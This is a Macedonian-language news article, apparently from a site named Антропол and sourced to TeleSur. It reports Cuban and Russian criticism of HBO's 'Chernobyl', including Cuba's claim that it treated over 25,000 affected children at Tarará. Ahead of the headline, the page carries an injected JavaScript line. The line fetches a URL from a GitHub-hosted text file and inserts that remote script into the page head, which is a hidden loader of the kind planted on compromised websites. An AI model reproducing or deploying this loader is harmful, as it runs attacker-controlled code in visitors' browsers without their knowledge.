;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Кубанска помош: Што HBO не спомна во серијата „Чернобил"? - Антропол
АктуелноИнтернационално

Кубанска помош: Што HBO не спомна во серијата „Чернобил”?

Серијата „Чернобил” на HBO веќе е критикувана за својата историска неточност, но во неделата Куба дополнително истакна дека нивната клучна улога во обезбедувањето на бесплатен третман на жртвите е избришана од историјата.

Кубанска болница

Серијата на HBO ги обработува трагичните настани во Чернобил во 1986 година, каде што експлозија на нуклеарната постројка во поранешниот СССР предизвика многубројно губење на животи и труење со радијација. Серијата, во која глумат само британски актери, е обвинета дека е антисоветска пропаганда наменета да го претстави СССР како земја на себичните и неспособните, изјави рускиот дописник Росијскаја Газета.

“Луѓето се прикажани како пијандури, слично како што во некои холивудски филмови се појавуваат Словените како одвратни, одбивни ликови”.

Покрај тоа, руските медиуми го обвинија шоуто за повеќе историски неточности. Новинарот Александар Коц вели дека хеликоптерската несреќа што се појавува во серијата всушност се случила во сосема друго време, и дека начинот на кој е прикажан третманот на рударите историски не е издржан.

Сепак, сега и кубанските медиуми се приклучија во дебатата, обвинувајќи ја HBO за бришење на улогата на социјалистичкиот остров во обезбедувањето бесплатен третман за оние погодени од катастрофата во Чернобил, објави кубанскиот медиум Кабадебејт.

На плажите на Тарара, 30 километри од Хавана, Куба претвори елитно туристичко село во огромен здравствен комплекс за деца кои биле погодени од нуклеарната катастрофа.

Здравствениот комплекс содржеше болници, училишта и рекреативни области, каде што децата можеа да закрепнат во холистички амбиент. Кабадебејт во неделата објави дека повеќе од 25.000 деца биле лечени од труење од радијација помеѓу 1990 и 2011 година, главно за рак, деформации, мускулна атрофија и други состојби поврзани со зрачење.

Сеопфатниот третман, обезбеден од страна на Куба, беше во посебен период на интензивни економски тешкотии што следеа за државата по колапсот на Советскиот Сојуз, по што Куба остана без својот главен извозник. И покрај економските проблеми во тие години, центарот за третман во Тарара продолжи да работи. Еден кубански лекар за ТелеСур за програмата во 2017 година изјави: „Иако Куба економски беше во тешка состојба, нашата држава продолжи да нуди специјализирано лечење на малолетници, на тој начин исполнувајќи ја својата посветеност на солидарноста”.

Текстот е преземен од ТелеСур.